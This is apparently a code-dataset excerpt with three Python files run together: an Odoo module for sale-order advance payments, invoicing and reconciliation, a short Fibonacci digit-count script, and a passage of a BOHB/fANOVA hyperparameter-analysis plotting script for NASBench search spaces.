self.order_line.filtered(\r\n lambda x: x.product_id == product)\r\n if corresponding_line:\r\n corresponding_line.product_uom_qty += qty\r\n else:\r\n line = self.order_line.new({\r\n 'product_id': product.id,\r\n 'product_uom_qty': qty,\r\n 'order_id': self.id,\r\n })\r\n line.product_id_change()\r\n return True\r\n\r\n\r\n def recalculate_prices(self):\r\n for record in self:\r\n if record.order_line:\r\n for line in record.order_line:\r\n res = line.product_id_change()\r\n res2 = line._onchange_discount()\r\n #print \"######### RES >>> \",res\r\n #self.update(res)\r\n return True\r\n\r\n def re_inviced_public(self):\r\n for rec in self:\r\n # invoice_obj = self.env['account.move']\r\n # invoice_line_obj = self.env['account.move.line']\r\n # rec.re_invoiced = True\r\n # invoice_vals = rec._prepare_invoice()\r\n # invoice_id = invoice_obj.create(invoice_vals)\r\n # for line in rec.order_line:\r\n # invoice_line_vals = line._prepare_invoice_line()\r\n # invoice_line_id = invoice_line_obj.sudo().with_context(default_move_type='out_invoice').create(invoice_line_vals)\r\n # invoice_line_id.write({'invoice_id': invoice_id.id})\r\n\r\n # invoice_id.compute_taxes()\r\n invoice_ids = rec._create_invoice_single()\r\n for inv in invoice_ids:\r\n for line in inv.invoice_line_ids:\r\n line.order_to_global_id = self.id\r\n line.re_invoiced = True\r\n return {\r\n 'name': _('Refacturacion del Pedido %s' % rec.name),\r\n 'view_mode': 'form',\r\n 'view_id': self.env.ref('account.view_move_form').id,\r\n 'res_model': 'account.move',\r\n 'context': \"{}\", # self.env.context\r\n 'type': 'ir.actions.act_window',\r\n 'res_id': invoice_ids[0].id,\r\n }\r\n \r\n def _create_invoice_single(self, grouped=False, final=False, date=None):\r\n \"\"\"\r\n Create the invoice associated to the SO.\r\n :param grouped: if True, invoices are grouped by SO id. 
If False, invoices are grouped by\r\n (partner_invoice_id, currency)\r\n :param final: if True, refunds will be generated if necessary\r\n :returns: list of created invoices\r\n \"\"\"\r\n \r\n precision = self.env['decimal.precision'].precision_get('Product Unit of Measure')\r\n\r\n # 1) Create invoices.\r\n invoice_vals_list = []\r\n invoice_item_sequence = 0\r\n for order in self:\r\n order = order.with_company(order.company_id)\r\n current_section_vals = None\r\n down_payments = order.env['sale.order.line']\r\n\r\n # Invoice values.\r\n invoice_vals = order._prepare_invoice()\r\n\r\n # Invoice line values (keep only necessary sections).\r\n invoice_lines_vals = []\r\n for line in order.order_line:\r\n if line.display_type == 'line_section':\r\n current_section_vals = line._prepare_invoice_line(sequence=invoice_item_sequence + 1)\r\n continue\r\n\r\n if current_section_vals:\r\n invoice_item_sequence += 1\r\n invoice_lines_vals.append(current_section_vals)\r\n current_section_vals = None\r\n invoice_item_sequence += 1\r\n prepared_line = line._prepare_invoice_line(quantity=line.product_uom_qty)\r\n invoice_lines_vals.append(prepared_line)\r\n\r\n # If down payments are present in SO, group them under common section\r\n if down_payments:\r\n invoice_item_sequence += 1\r\n down_payments_section = order._prepare_down_payment_section_line(sequence=invoice_item_sequence)\r\n invoice_lines_vals.append(down_payments_section)\r\n for down_payment in down_payments:\r\n invoice_item_sequence += 1\r\n invoice_down_payment_vals = down_payment._prepare_invoice_line(sequence=invoice_item_sequence)\r\n invoice_lines_vals.append(invoice_down_payment_vals)\r\n\r\n invoice_vals['invoice_line_ids'] = [(0, 0, invoice_line_id) for invoice_line_id in invoice_lines_vals]\r\n\r\n invoice_vals_list.append(invoice_vals)\r\n\r\n # 2) Manage 'grouped' parameter: group by (partner_id, currency_id).\r\n if not grouped:\r\n new_invoice_vals_list = []\r\n invoice_grouping_keys = self._get_invoice_grouping_keys()\r\n for grouping_keys, invoices in groupby(invoice_vals_list, key=lambda x: [x.get(grouping_key) for grouping_key in invoice_grouping_keys]):\r\n origins = set()\r\n payment_refs = set()\r\n refs = set()\r\n ref_invoice_vals = None\r\n for invoice_vals in invoices:\r\n if not ref_invoice_vals:\r\n ref_invoice_vals = invoice_vals\r\n else:\r\n ref_invoice_vals['invoice_line_ids'] += invoice_vals['invoice_line_ids']\r\n origins.add(invoice_vals['invoice_origin'])\r\n payment_refs.add(invoice_vals['payment_reference'])\r\n refs.add(invoice_vals['ref'])\r\n ref_invoice_vals.update({\r\n 'ref': ', '.join(refs)[:2000],\r\n 'invoice_origin': ', '.join(origins),\r\n 'payment_reference': len(payment_refs) == 1 and payment_refs.pop() or False,\r\n })\r\n new_invoice_vals_list.append(ref_invoice_vals)\r\n invoice_vals_list = new_invoice_vals_list\r\n\r\n # 3) Create invoices.\r\n # Manage the creation of invoices in sudo because a salesperson must be able to generate an invoice from a\r\n # sale order without \"billing\" access rights. However, he should not be able to create an invoice from scratch.\r\n moves = self.env['account.move'].sudo().with_context(default_move_type='out_invoice').create(invoice_vals_list)\r\n # 4) Some moves might actually be refunds: convert them if the total amount is negative\r\n # We do this after the moves have been created since we need taxes, etc. 
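`_create_invoice_single` above groups `invoice_vals_list` with `itertools.groupby`. Worth remembering: `groupby` only merges *consecutive* items with equal keys, so unless the list is already ordered by the grouping keys, equal keys arriving apart end up in separate groups. A standalone illustration (the dicts are hypothetical stand-ins for invoice values):

```python
from itertools import groupby

invoice_vals = [
    {"partner_id": 1, "ref": "SO1"},
    {"partner_id": 2, "ref": "SO2"},
    {"partner_id": 1, "ref": "SO3"},  # same key as SO1, but not adjacent
]
keyfunc = lambda v: (v["partner_id"],)
for key, group in groupby(sorted(invoice_vals, key=keyfunc), key=keyfunc):
    print(key, [g["ref"] for g in group])
# (1,) ['SO1', 'SO3']
# (2,) ['SO2']
# Without the sorted(...), partner 1 would appear as two separate groups.
```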
to know if the total\r\n # is actually negative or not\r\n if final:\r\n moves.sudo().filtered(lambda m: m.amount_total < 0).action_switch_invoice_into_refund_credit_note()\r\n for move in moves:\r\n move.message_post_with_view('mail.message_origin_link',\r\n values={'self': move, 'origin': move.line_ids.mapped('sale_line_ids.order_id')},\r\n subtype_id=self.env.ref('mail.mt_note').id\r\n )\r\n return moves \r\n\r\n\r\n\r\n ### Reemplazamos Imprimir por el Ticket ###\r\n def print_ticket(self):\r\n self.filtered(lambda s: s.state == 'draft').write({'state': 'sent'})\r\n #return self.env['report'].get_action(self, 'easy_counter_sales_management.template_easy_ticket')\r\n return self.env.ref('fx_sale_advance_payment.report_eaty_order_ticket').report_action(self)\r\n\r\nclass account_payment(models.Model):\r\n _inherit = 'account.payment'\r\n\r\n sale_order_id = fields.Many2one('sale.order','Pedido de Venta', copy=False)\r\n easy_refund = fields.Float('Cambio')\r\n is_global_invoice_move = fields.Boolean('Apunte Agrupador')\r\n global_invoice_id = fields.Many2one('account.invoice','Factura Global')\r\n\r\n create_in_state_sale = fields.Selection([('draft', 'Borrador'),\r\n ('confirm', 'Confirmado')],\r\n default='confirm',\r\n string=\"Estado del Pago\")\r\n\r\n def create_sale_adv_payment(self):\r\n amount_residual = self.sale_order_id.amount_total-self.sale_order_id.amount_payment\r\n if self.amount <= 0.0:\r\n raise ValidationError(_(\"El monto del pago no puede ser negativo o Cero.\"))\r\n if self.create_in_state_sale == 'confirm':\r\n self.action_post()\r\n if self.easy_refund:\r\n self.amount = self.amount - self.easy_refund\r\n if self.env.context.get('active_id'):\r\n sale_id = self.env['sale.order'].browse(self.env.context.get('active_id'))\r\n sale_id.write({'adv_payment_ids': [(4, self.id)]})\r\n if self.sale_order_id and self.create_in_state_sale == 'confirm': \r\n # self.write({\r\n # 'sale_order_id': sale_id.id,\r\n # })\r\n amount_payment = self.amount+sale_id.amount_payment\r\n sale_id.write({'amount_payment':amount_payment})\r\n amount_payment = amount_payment+0.01\r\n if amount_payment >= sale_id.amount_total:\r\n sale_id.write({'total_payment':True, 'user_payment_register_id': self.env.user.id}) \r\n if sale_id.amount_payment > sale_id.amount_total+0.01: \r\n raise ValidationError(_(\"El monto del pago no puede superar al monto adeudado.\"))\r\n\r\n return True\r\n\r\n @api.onchange('easy_refund','sale_order_id','amount')\r\n def on_change_easy_refund(self):\r\n if self.sale_order_id:\r\n amount_residual = self.sale_order_id.amount_total-self.sale_order_id.amount_payment\r\n amount_to_pay = self.sale_order_id.amount_payment + self.amount\r\n if amount_to_pay > self.sale_order_id.amount_total:\r\n #self.amount = self.sale_order_id.amount_total\r\n easy_refund = amount_to_pay - self.sale_order_id.amount_total\r\n self.easy_refund = easy_refund\r\n self.sale_order_id.write({'easy_refund':easy_refund})\r\n else:\r\n if not self.amount:\r\n self.amount = self.sale_order_id.amount_total\r\n else:\r\n self.amount = self.amount\r\n\r\n def action_post(self):\r\n context = self._context\r\n res = super(account_payment, self).action_post()\r\n active_model = context.get('active_model', '')\r\n if active_model == 'sale.order':\r\n return res\r\n for rec in self:\r\n if rec.sale_order_id:\r\n amount_payment = rec.amount+rec.sale_order_id.amount_payment\r\n rec.sale_order_id.write({'amount_payment':amount_payment})\r\n amount_payment = amount_payment+0.01\r\n if amount_payment >= 
rec.sale_order_id.amount_total:\r\n rec.sale_order_id.write({'total_payment':True, 'user_payment_register_id': self.env.user.id}) \r\n if rec.sale_order_id.amount_payment > rec.sale_order_id.amount_total+0.01: \r\n raise ValidationError(_(\"El monto del pago no puede superar al monto adeudado.\"))\r\n return res\r\n\r\n def action_draft(self):\r\n res = super(account_payment, self).action_draft()\r\n for rec in self:\r\n if rec.sale_order_id:\r\n # if rec.sale_order_id.invoice_status == 'invoiced':\r\n # raise UserError(\"Error!\\nEl pedido de venta relacionado se encuentra Facturado.\\nRompa Conciliacion o consulte al Administrador.\")\r\n amount_payment = rec.sale_order_id.amount_payment - rec.amount\r\n vals = {\r\n 'total_payment': False,\r\n 'amount_payment': amount_payment,\r\n }\r\n rec.sale_order_id.write(vals)\r\n return res\r\n\r\n\r\nclass AccountInvoice(models.Model):\r\n _inherit = 'account.move'\r\n\r\n @api.depends('state', 'invoice_line_ids')\r\n def _get_orders_rel(self):\r\n for invoice in self:\r\n if type(invoice.id) == int:\r\n self.env.cr.execute(\"\"\"\r\n select sale_order_line.order_id from sale_order_line_invoice_rel \r\n join account_move_line on sale_order_line_invoice_rel.invoice_line_id = account_move_line.id\r\n join sale_order_line on sale_order_line.id = sale_order_line_invoice_rel.order_line_id\r\n and account_move_line.move_id = %s\r\n group by sale_order_line.order_id\r\n\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n order_list = []\r\n self.env.cr.execute(\"\"\"\r\n select sale_id from account_invoice_sale_rel\r\n where invoice_id = %s;\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res:\r\n if cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res if x]\r\n # print \"#### PEDIDOS RELACIONADOS >>> \",order_list\r\n if not order_list:\r\n order_list = []\r\n self.env.cr.execute(\"\"\"\r\n select order_to_global_id\r\n from account_move_line where move_id = %s;\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res:\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list_2 = [x[0] for x in cr_res]\r\n if order_list_2:\r\n order_list = order_list+order_list_2\r\n if not order_list:\r\n invoice_line_list = [x.id for x in invoice.invoice_line_ids]\r\n if invoice_line_list:\r\n self.env.cr.execute(\"\"\"\r\n select order_line_id from sale_order_line_invoice_rel\r\n where invoice_line_id in %s;\r\n \"\"\", (tuple(invoice_line_list),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n sale_order_res = [x[0] for x in cr_res]\r\n self.env.cr.execute(\"\"\"\r\n select order_id from sale_order_line\r\n where id in %s;\r\n \"\"\", (tuple(sale_order_res),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res]\r\n\r\n invoice.update({\r\n 'sale_ids': order_list,\r\n })\r\n else:\r\n invoice.update({\r\n 'sale_ids': False,\r\n })\r\n\r\n\r\n @api.depends('sale_ids')\r\n def _get_orders(self):\r\n for rec in self:\r\n orders_count = 0\r\n orders_list = []\r\n if rec.sale_ids:\r\n for order in rec.sale_ids:\r\n if order:\r\n if order.id not in orders_list:\r\n orders_list.append(order.id)\r\n rec.orders_count = len(orders_list)\r\n\r\n orders_count = fields.Integer(string='# of Pedidos', compute='_get_orders', readonly=True)\r\n\r\n 
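The payment logic above nudges `amount_payment` by `+0.01` before comparing it to the order total, a hand-rolled float-rounding tolerance. `odoo.tools.float_compare`, already imported at the top of this file, expresses that intent explicitly; a hedged sketch (the helper name is mine):

```python
from odoo.tools import float_compare

def is_fully_paid(amount_payment, amount_total, precision_digits=2):
    # float_compare returns -1, 0 or 1; >= 0 means the amount paid reaches
    # the total within 2-decimal currency rounding, no magic 0.01 needed.
    return float_compare(amount_payment, amount_total,
                         precision_digits=precision_digits) >= 0
```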
sale_ids = fields.Many2many(\"sale.order\", string='Pedidos', compute=\"_get_orders_rel\", readonly=True, copy=False)\r\n is_global_invoice = fields.Boolean('Es una Factura Global', copy=False)\r\n\r\n\r\n def action_view_adv_sale_orders(self):\r\n action = self.env.ref('sale.action_orders').read()[0]\r\n action['domain'] = [('id', 'in', self.sale_ids.ids)] if self.sale_ids.ids else []\r\n action['context'] = {'create': 0}\r\n return action\r\n\r\n \r\n def action_post(self):\r\n res = super(AccountInvoice, self).action_post()\r\n mail_compose_message_pool = self.env['mail.compose.message']\r\n attachment_obj = self.env['ir.attachment']\r\n account_payment_obj = self.env['account.payment'].sudo()\r\n account_move_obj = self.env['account.move'].sudo()\r\n account_move_line_obj = self.env['account.move.line'].sudo()\r\n for rec in self.filtered(lambda w: w.move_type in ('out_invoice','out_refund') and \\\r\n w.amount_total): \r\n if rec.move_type == 'out_invoice':\r\n self.env.cr.execute(\"\"\"\r\n select sale_id from account_invoice_sale_rel\r\n where invoice_id = %s;\r\n \"\"\", (rec.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n # print \"####### order_list >>>> \",order_list\r\n if not order_list:\r\n self.env.cr.execute(\"\"\"\r\n select sale_order_line.order_id from sale_order_line_invoice_rel \r\n join account_move_line on sale_order_line_invoice_rel.invoice_line_id = account_move_line.id\r\n join sale_order_line on sale_order_line.id = sale_order_line_invoice_rel.order_line_id\r\n and account_move_line.move_id = %s\r\n group by sale_order_line.order_id\r\n\r\n \"\"\", (rec.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n return res\r\n ### Quitando las Excepciones de Pago ###\r\n self.env.cr.execute(\"\"\"\r\n select id from sale_order \r\n where id in %s and payment_exception=False;\r\n \"\"\",(tuple(order_list),))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = [x[0] for x in cr_res]\r\n ### FIN ###\r\n\r\n if not order_list:\r\n invoice_line_list = [x.id for x in rec.invoice_line_ids]\r\n if invoice_line_list:\r\n self.env.cr.execute(\"\"\"\r\n select order_line_id from sale_order_line_invoice_rel\r\n where invoice_line_id in %s;\r\n \"\"\", (tuple(invoice_line_list),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n sale_order_res = [x[0] for x in cr_res]\r\n self.env.cr.execute(\"\"\"\r\n select order_id from sale_order_line\r\n where id in %s;\r\n \"\"\", (tuple(sale_order_res),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res]\r\n if not order_list:\r\n return res\r\n payment_list = account_payment_obj.search([('state','in',('posted','reconciled')),('sale_order_id','in',tuple(order_list))])\r\n # self.env.cr.execute(\"\"\"\r\n # select id from account_payment\r\n # where sale_order_id in %s \r\n # and state in ('posted','reconciled') ;\r\n # \"\"\",(tuple(order_list),))\r\n # cr_res = self.env.cr.fetchall()\r\n # payment_list = [x[0] for x in cr_res]\r\n\r\n return res\r\n\r\n def reconcile_payments_sale_order(self):\r\n payment_obj = self.env['account.payment']\r\n account_move_obj = self.env['account.move'].sudo()\r\n account_move_line_obj = self.env['account.move.line'].sudo()\r\n for invoice in self:\r\n ### Si no es Factura Global ###\r\n self.env.cr.execute(\"\"\"\r\n select 
sale_order_line.order_id from sale_order_line_invoice_rel \r\n join account_move_line on sale_order_line_invoice_rel.invoice_line_id = account_move_line.id\r\n join sale_order_line on sale_order_line.id = sale_order_line_invoice_rel.order_line_id\r\n and account_move_line.move_id = %s\r\n group by sale_order_line.order_id\r\n\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n self.env.cr.execute(\"\"\"\r\n select sale_id from account_invoice_sale_rel\r\n where invoice_id = %s;\r\n \"\"\", (invoice.id,))\r\n cr_res = self.env.cr.fetchall()\r\n order_list = []\r\n if cr_res:\r\n order_list = [x[0] for x in cr_res if x]\r\n if not order_list:\r\n raise UserError(_(\"Error!\\nNo existen registros de Pedidos a Conciliar.\"))\r\n if not order_list:\r\n invoice_line_list = [x.id for x in rec.invoice_line_ids]\r\n if invoice_line_list:\r\n self.env.cr.execute(\"\"\"\r\n select order_line_id from sale_order_line_invoice_rel\r\n where invoice_line_id in %s;\r\n \"\"\", (tuple(invoice_line_list),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n sale_order_res = [x[0] for x in cr_res]\r\n self.env.cr.execute(\"\"\"\r\n select order_id from sale_order_line\r\n where id in %s;\r\n \"\"\", (tuple(sale_order_res),))\r\n cr_res = self.env.cr.fetchall()\r\n if cr_res and cr_res[0] and cr_res[0][0]:\r\n order_list = [x[0] for x in cr_res]\r\n\r\n for order in self.env['sale.order'].browse(order_list):\r\n if order.total_payment == False and order.payment_exception == False:\r\n raise UserError(_(\"Error!\\nEl Pedido %s no se encuentra pagado en su totalidad. \\nPuede activar la Excepcion de Pago en el Pedido o Pedidos Origen.\" % order.name))\r\n\r\n ### Conciliando ####\r\n payment_list = payment_obj.search([('state','in',('posted','reconciled')),('sale_order_id','in',tuple(order_list))])\r\n if not payment_list:\r\n raise UserError(_(\"Error!\\nNo existen Pagos para Conciliar.\"))\r\n\r\n ## Esto es para la version Normal con metodos de Odoo ###\r\n amls_to_reconcile = self.env['account.move.line']\r\n moves_to_reclasification = []\r\n for payment in payment_list.sudo():\r\n payment.write({'partner_id':invoice.partner_id.id})\r\n if payment.move_id and payment.move_id not in moves_to_reclasification:\r\n moves_to_reclasification.append(payment.move_id)\r\n amls_to_reconcile_payments = []\r\n if moves_to_reclasification:\r\n for mv in moves_to_reclasification:\r\n # Cambiando el Partner ##\r\n partner_list = [x.partner_id.id for x in mv.line_ids if x.partner_id]\r\n partner_list = list(set(partner_list))\r\n if partner_list:\r\n if invoice.partner_id.id != partner_list[0]:\r\n ## Cambiando el partner en las Partidas #\r\n for mv_line in mv.line_ids:\r\n mv_line.write({'partner_id':invoice.partner_id.id})\r\n mv_line.move_id.write({'partner_id':invoice.partner_id.id})\r\n for move_line in mv.line_ids.filtered(lambda r: not r.reconciled and r.account_id.internal_type in ('payable', 'receivable')):\r\n amls_to_reconcile += move_line\r\n amls_to_reconcile_payments.append(move_line)\r\n amls_to_reconcile += invoice.line_ids.filtered(lambda r: not r.reconciled and r.account_id.internal_type in ('payable', 'receivable'))\r\n amls_to_reconcile.reconcile()\r\n if invoice.currency_id.is_zero(invoice.amount_residual): \r\n new_pmt_state = 'paid'\r\n invoice.payment_state = new_pmt_state\r\n\r\n def reconcile_customer_invoices(self, move_id, invoice_ids):\r\n 
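Several raw queries above filter with `payment_exception=False`. In PostgreSQL `= False` does not match NULL, and an Odoo boolean column can hold NULL for rows that predate the field or were written outside the ORM; `IS NOT TRUE` covers both FALSE and NULL. A sketch of the filter in `action_post` rewritten that way (same parameterization, meant for the same model context):

```python
self.env.cr.execute("""
    SELECT id FROM sale_order
    WHERE id IN %s AND payment_exception IS NOT TRUE;
""", (tuple(order_list),))
order_list = [row[0] for row in self.env.cr.fetchall()]
```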
move_line_obj = self.env['account.move.line']\r\n\r\n for invoice in invoice_ids:\r\n invoice_move_line = invoice.move_id.line_ids.filtered(lambda r: r.account_id.internal_type=='receivable')\r\n expense_move_line = move_id.line_ids.filtered(lambda r: r.account_id.internal_type=='receivable' and r.partner_id.id==invoice.partner_id.id \\\r\n and invoice.reference in r.name and r.debit==invoice.residual)\r\n (invoice_move_line + expense_move_line).reconcile()\r\n \r\n return\r\n","sub_path":"fx_sale_advance_payment/models/sale.py","file_name":"sale.py","file_ext":"py","file_size_in_byte":40290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"270941643","text":"a=0\r\nb=1\r\ndes=10\r\n\r\nimport math\r\n\r\nfor n in range(2,1000000,1):\r\n c=b+a\r\n if (c/des)>=1:\r\n if (des==pow(10,999)):\r\n print('', n)\r\n des=des*10\r\n a=b\r\n b=c\r\n","sub_path":"25.Naloga/py.py","file_name":"py.py","file_ext":"py","file_size_in_byte":192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"576463887","text":"import os\nimport itertools\nimport argparse\nimport pickle\nimport collections\n#from IPython import embed\n\nimport result as hpres\nimport hpbandster.visualization as hpvis\n\nimport numpy as np\nimport scipy.stats as sps\n\nimport matplotlib\nmatplotlib.rcParams.update({'font.size': 14})\nimport matplotlib.pyplot as plt\n\nimport ConfigSpace as CS\nimport ConfigSpace.hyperparameters as CSH\n\nimport fanova\nimport fanova.visualizer\n\n\nparser = argparse.ArgumentParser(description='fANOVA analysis')\nparser.add_argument('--run_id', type=int, default=0)\nparser.add_argument('--working_directory', type=str, help='directory where to'\n ' store the live rundata', default='../bohb_output')\nparser.add_argument('--space', type=int, default=1, help='NASBench space')\nparser.add_argument('--seed', type=int, default=1, help='Seed')\nargs = parser.parse_args()\n\ns1_min = 0.05448716878890991\ns2_min = 0.057592153549194336\ns3_min = 0.05338543653488159\n\nArchitecture = collections.namedtuple('Architecture', ['adjacency_matrix', 'node_list'])\n\nclass Model(object):\n def __init__(self):\n self.validation_accuracy = None\n self.test_accuracy = None\n self.training_time = None\n self.arch = None\n\n def __str__(self):\n \"\"\"Prints a readable version of this bitstring.\"\"\"\n return '{0:b}'.format(self.arch)\n\n\ndef extract_HB_learning_curves(runs):\n \"\"\"\n function to get the hyperband learning curves.\n This is an example function showing the interface to use the\n HB_result.get_learning_curves method.\n Parameters:\n -----------\n runs: list of HB_result.run objects\n the performed runs for an unspecified config\n Returns:\n --------\n list of learning curves: list of lists of tuples\n An individual learning curve is a list of (t, x_t) tuples.\n This function must return a list of these. One could think\n of cases where one could extract multiple learning curves\n from these runs, e.g. 
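The 25.Naloga record above tracks the digit count of Fibonacci numbers by comparing against successive powers of ten. `len(str(...))` states the same idea directly; a standalone sketch of the Project Euler 25 calculation (function name is mine):

```python
def first_fib_index_with_digits(n_digits=1000):
    # a, b walk the sequence F(1)=1, F(2)=1; idx tracks b's index.
    a, b, idx = 1, 1, 2
    while len(str(b)) < n_digits:
        a, b = b, a + b
        idx += 1
    return idx

print(first_fib_index_with_digits())  # 4782
```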
if each run is an independent training\n run of a neural network on the data.\n \"\"\"\n sr = filter(lambda r: not r.loss is None, sorted(runs, key=lambda r: r.budget))\n value = [[(r.budget, r.info['test_error']) for r in sr],]\n return(value)\n\n\nbohb_logs_dir = '{}/search_space_{}/run{}-seed{}'.format(\n args.working_directory, args.space, args.run_id, args.seed\n)\nres = hpres.logged_results_to_HB_result(bohb_logs_dir)\n\nlcs_temp = res.get_learning_curves(lc_extractor = extract_HB_learning_curves)\nlcs = dict(lcs_temp)\nfor key, value in lcs_temp.items():\n if value == [[]]:\n del lcs[key]\n\ntool_tips = hpvis.default_tool_tips(res, lcs)\n#embed()\n\ninc_id = res.get_incumbent_id()\n\nid2conf = res.get_id2config_mapping()\n\ninc_trajectory = res.get_incumbent_trajectory()\nprint(inc_trajectory)\nprint(res.get_runs_by_id(inc_id))\n\nall_runs = list(filter(lambda r: not (r.info is None or r.loss is None),\n res.get_all_runs()))\n\n\nbudgets = res.HB_config['budgets']\n\nrun_times = np.array([(r.budget,\n r.time_stamps['finished']-r.time_stamps['started']) for\n r in all_runs])\n\n\ndef compare_val_and_test_error():\n errors = np.array([(r.info['test_error'], r.info['val_error']) for r in\n all_runs])\n plt.scatter(errors[:,0], errors[:,1])\n plt.plot([0,100], [0,100])\n plt.show()\n\n#plt.plot(inc_trajectory['times_finished'], inc_trajectory['losses'], label=run)\n#plt.legend()\n#plt.show()\n\n#hpvis.interactive_HB_plot(lcs, tool_tip_strings=tool_tips)\n\nruns_by_budget = {}\n\nfor b in budgets:\n runs_by_budget[b] = list(filter(lambda r: r.budget == b, all_runs))\n\n\ndef fanova_analysis():\n config_space = CS.ConfigurationSpace()\n #config_space.add_hyperparameter(CSH.UniformFloatHyperparameter('learning_rate',\n # lower=1e-3,\n # upper=1,\n # log=True))\n config_space.add_hyperparameter(CSH.UniformFloatHyperparameter('weight_decay',\n lower=1e-5,\n upper=1e-2,\n log=False))\n config_space.add_hyperparameter(CSH.UniformFloatHyperparameter('cutout_prob',\n lower=0,\n upper=1,\n log=False))\n\n for b in reversed(budgets):\n X, y, new_cs = res.get_fANOVA_data(config_space, budgets=[b])\n f = fanova.fANOVA(X, y, new_cs)\n\n dir = './fANOVA/search_space_%d/run%d-seed%d/plots_%i'%(\n args.space, args.run_id, args.seed, b\n )\n os.makedirs(dir, exist_ok=True)\n\n dir_overleaf = './fANOVA_1/'\n os.makedirs(dir_overleaf, exist_ok=True)\n fig_name = './fANOVA_1'+'/s%d-run%d-seed%d-%d.png'%(\n args.space, args.run_id, args.seed, b\n )\n\n vis = fanova.visualizer.Visualizer(f, new_cs, dir, y_label='Validation Error')\n\n print(b)\n\n best_run_idx = np.argsort([r.loss for r in runs_by_budget[b]])[0]\n best_run = runs_by_budget[b][best_run_idx]\n\n inc_conf = id2conf[best_run.config_id]['config']\n inc_conf['budget'] = best_run.budget\n inc_line_style = {'linewidth': 3, 'color': 'lightgray', 'linestyle': 'dashed'}\n\n for i, hp in enumerate(config_space.get_hyperparameters()):\n print(f.quantify_importance([hp.name]))\n fig = vis.plot_marginal(i, show=False) # hp.name instead of i\n fig.axvline(x=inc_conf[hp.name], **inc_line_style)\n #fig.yscale('log')\n fig.xscale('log')\n fig.title('importance %3.1f%%'%(\n f.quantify_importance([hp.name])[(hp.name,)]['individual importance']*100)\n )\n fig.tight_layout()\n fig.savefig(dir+'/%s.png'%hp.name)\n fig.close()\n\n for hp1, hp2 in itertools.combinations(config_space.get_hyperparameters(), 2):\n n1, n2 = hp1.name,hp2.name\n fig = vis.plot_pairwise_marginal([n1,n2], show=False, three_d=False)\n #fig.axvline(x=inc_conf[n1], **inc_line_style)\n 
#fig.axhline(y=inc_conf[n2], **inc_line_style\n xlims = fig.xlim()\n ylims = fig.ylim()\n\n fig.scatter([inc_conf[n1]], [inc_conf[n2]], color='lightgray',\n s=800, marker='x', linewidth=5)\n fig.xlim(xlims)\n fig.ylim(ylims)\n\n importance = f.quantify_importance([n1,n2])[(n1,n2)]['total importance']\n #fig.title(\"importance %3.1f%%\"%(importance*100))\n fig.title(\"Space %d, Budget: %d epochs\"%(args.space, b))\n fig.tight_layout()\n fig.savefig(fig_name)\n fig.close()\n\n print(f.get_most_important_pairwise_marginals())\n #vis.create_all_plots(three_d=False)\n\n\ndef trajectory_plot():\n print(inc_trajectory.keys())\n plt.figure(figsize=(8,4.5))\n\n #plt.step(inc_trajectory['times_finished'], inc_trajectory['losses'],\n # where='post', color='black', linewidth=3)\n\n for b,c in zip(budgets, ['gray','blue', 'orange']):\n run_points = np.array([\n (r.time_stamps['finished']+(r.info['runtime'][0]*60),\n r.info['test_error'][0] - eval('s{}_min'.format(args.space)) ) for r in runs_by_budget[b]])\n plt.scatter(\n run_points[:,0], run_points[:,1], color=c,\n label='budget = %i epochs'%b, s=75\n )\n\n # plot RE incumbent\n re_path = 'regularized_evolution'\n runs = []\n for seed in range(6):\n filename = os.path.join(re_path,\n 'algo_RE_0_ssp_{}_seed_{}.obj'.format(args.space,\n seed))\n with open(filename, 'rb') as f:\n data = pickle.load(f)\n runs.append(data)\n\n accuracies = list(map(lambda x: max(x, key=lambda y: y.test_accuracy).test_accuracy,\n runs))\n re_mean = np.mean(1 - np.asarray(accuracies) - eval('s{}_min'.format(args.space)))\n re_std = np.std(1 - np.asarray(accuracies) - eval('s{}_min'.format(args.space)))\n\n _x_values = np.arange(1800, 5e5)\n darts_error = np.zeros(_x_values.size)\n darts_error.fill(re_mean)\n plt.fill_between(_x_values, darts_error+re_std, darts_error-re_std,\n color='g', alpha=.3)\n plt.plot(_x_values, darts_error, color='g', label='RE')\n\n #plt.hlines(re_mean, xmin=0, xmax=3e5, color='g')\n\n\n #plt.scatter(inc_trajectory['times_finished'][:-1], inc_trajectory['losses'][:-1], c='red')\n plt.xscale('log')\n plt.xlim([4e4, 5e5]) #s3\n #plt.xlim([5e4, 5e5]) #s1\n #plt.xlim([5e4, 4e5]) #s2\n plt.yscale('log')\n #plt.ylim([5.6e-2, 1.3e-1]) #s1\n #plt.ylim([5.8e-2, 1.5e-1]) #s2\n plt.ylim([0.002, 2e-1]) #s3\n\n plt.ylabel('test regret')\n plt.xlabel('wallclock time [s]')\n plt.legend(fontsize=10)\n plt.title(\"Space %d\"%(args.space))\n plt.grid(True, which=\"both\",ls=\"-\")\n plt.tight_layout()\n\n 